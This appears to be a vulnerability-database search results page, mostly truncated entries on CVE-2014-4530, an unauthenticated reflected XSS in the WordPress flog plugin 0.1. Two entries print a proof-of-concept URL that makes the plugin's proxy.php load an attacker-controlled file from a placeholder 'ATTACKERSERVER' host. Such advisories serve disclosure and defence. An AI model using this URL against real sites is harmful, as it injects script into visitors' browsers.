8 matches found
CVE-2014-4530
flog plugin 0.1 for WordPress has XSS...
EUVD-2014-4457
Malware in sbrugna...
CVE-2014-4530
flog plugin 0.1 for WordPress has XSS...
Cross site scripting
flog plugin 0.1 for WordPress has XSS...
CVE-2014-4530
flog plugin 0.1 for WordPress has XSS...
CVE-2014-4530
CVE-2014-4530 concerns the WordPress flog plugin (version 0.1). The vulnerability is a cross-site scripting (XSS) issue arising from insufficient input validation in the flog plugin, leading to unauthenticated, reflected XSS. Multiple connected sources (Red Hat, CNVD, NVD, CVE lists, and WP explo...
Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html With the payload in the test.html file controlled by the attackers...
Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. PoC https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html With the payload in the test.html file controlled by the attackers...